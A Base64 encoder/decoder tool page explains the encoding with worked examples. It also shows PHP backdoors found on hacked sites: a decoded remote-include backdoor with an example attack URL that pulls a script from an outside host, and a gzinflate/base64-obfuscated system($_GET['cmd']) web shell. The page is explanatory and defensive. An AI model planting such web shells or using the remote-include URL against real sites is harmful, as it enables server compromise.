Decode Base64 online

EnglishNederlands
Base64 decode | Decimal to binary | Hexadecimal converter | Hash generator | Colored QR Code
Cisco password cracker | Base64 to image | MAC address database| Online Device Explorer
Decode gzinflate base64 | IP Address | TCP-UDP Port check | Cisco docs

Base64 Decoder - Encoder.

This base64 online decoder tool allows you to encode the text to ASCII characters and decode Base64 online. Base64 decode / encode most commonly used in e-mail protocols to transfer binary data such as files and pictures. Also spammers and hackers make use of base64 decode option to hide the content of their scripts or messages from simple antispam or antivirus programs, filters or from people eyes.

To encode or decode base64 online, just paste your string in the textarea.

If you need to decode eval(gzinflate(base64_decode, please scroll down this page and use gzinflate decoder.

Base64 decode | encode



How base64 encoding works?

Base64 encode example A.

× Let's begin with a string "Base64"

Base64


× Hexadecimal representation:

426173653634


× Binary representation: Binary converter

010000100110000101110011011001010011011000110100


× Now we need to split the result in groups of 6 bits.

010000100110000101110011011001010011011000110100


× Next, convert the groups of 6 bits into decimal representation.

163855125192452


× Now we can use the base64 encoding table to convert the decimal values
into base64 equivalent.

QmFzZTY0


Base64 encode example B.

× We will split the string "Base64" into two smaller strings: "Ba" and "se64" and encode it into Base64.
So, we have:

Ba


× Hexadecimal representation:

4261


× Binary representation:

0100001001100001


× We can split it in two groups of 6 bits. But the last group is only 4 bits long,
so we need to add two extra bits of '0' and remember it by putting a '=' at the end.

010000100110000100


× In decimal:

16384


× Base64 encoded equivalent:

QmE=


Base64 encode example C.

se64


× Hexadecimal representation:

73653634


× Binary representation:

01110011011001010011011000110100


× Splitted in groups of 6 bits. The last group contains only two bits.
Because of this we need to add four extra bits of '0' and put two '=' at the end.

011100110110010100110110001101000000


× Base64 encoded string will be:

c2U2NA==


Base64 encoding table.

Base64 encoding table



Eval base64_decode.

Eval(base64_decode("aWYoaXNzZXQoJF9HRVRbImNtZCJdKSlpbmNsdWRlICRfR0VUWyJjbWQiXTs=")); What it means? If you found something like this in the code of your website, most probably your site is hacked. This is a kind of backdoor in your site. Decoded from Base64 it will be

if(isset($_GET["cmd"]))include $_GET["cmd"];

An attacker can execute own scripts in the content of your website. He can do it like this

http://www.yoursite.com/index.php?cmd=http://www.somesite.com/somescript.txt

Somescript.txt can contain a code like this system("dir"); where "dir" is a command that will be executed.

Fortunately attacker do not think about the fact that he uses method GET, so you can see in the webserver logs what he did exactly.

If you found it in your site first of all change your passwords, check file rights (that should be 644), newer use the same passwords for database and FTP, bacause the database password most commonly stored in plain-text. Do not use shared hosting, bacause if one website located on shared hosting is hacked, it is simple to hack any other website located at same server.

Decode eval gzinflate base64_decode.

Base64 decoder above will show something like this



when you try to decode this php web shell
<?php
eval(gzinflate(base64_decode('K64sLknN1VCJd3cNiVZPzk1Rj9W0BgA=')));
?>

It's so, because this code was first compressed using gzdeflate and compressed data was encoded into base64. The script above will decode, decompress an execute obfuscated part of code.

Example below illustrate that kind of code obfuscation:

$ob='system($_GET[\'cmd\']);';
// Original // system($_GET['cmd']);
$gzcompressed = base64_encode(gzdeflate($ob));
// Obfuscated // K64sLknN1VCJd3cNiVZPzk1Rj9W0BgA=
$gzcompressed1 = base64_encode(gzdeflate($gzcompressed));
// Obfuscated two times // 8zYzKfbJzvMzDHP2SjFO9ssMiwqoyjYMyrIMN3BKd7QFAA==
$decompressed1 = gzinflate(base64_decode($gzcompressed1));
// Deobfuscated one time // K64sLknN1VCJd3cNiVZPzk1Rj9W0BgA=
$decompressed = gzinflate(base64_decode($decompressed1));
// Deobfuscated two times // system($_GET[\'cmd\']);

To decode gzinflate base64_decode construction automatically, paste your code below included php tags.

Decode Base64 gzinflate.


Base64 tools:

Base64 decoder - encoder. How base64 encoding works.
Gzinflate decode. Decode eval gzinflate encoding.
Image to base64, image from base64. Image base64 encoder. Image base64 decode.
Decimal to binary, binary to decimal. Convert decimal to binary, binary to decimal.
Hexadecimal converter. Convert decimal to hexadecimal, binary, octal.
Hash generator. Generate MD5, SHA1, SHA256 and other hashes.
Colored QR code generator.
Cisco password cracker. Decrypt Cisco 7 and Cisco VPN passwords.
MAC address lookup. Mac address database. MAC address range lookup.
MD5 hash decryptor. Crack MD5 passwords.
IP address whois lookup. Information about an ip address.
IP address range lookup. Find ISP ip address ranges.
TCP - UDP port checker. Check if port is open.
Google

Valid HTML 4.01 Transitional

Online decode encode tools:

Base64 decode | Decimal to binary | Hexadecimal converter | Hash generator | QR Code
Cisco password cracker | Base64 to image | MAC address database | Online Device Explorer
Decode gzinflate base64 | IP Address | TCP-UDP Port check | Books | Hashes | Cisco docs
About us Contact Contact via Facebook
© 2011-2013 Base64 online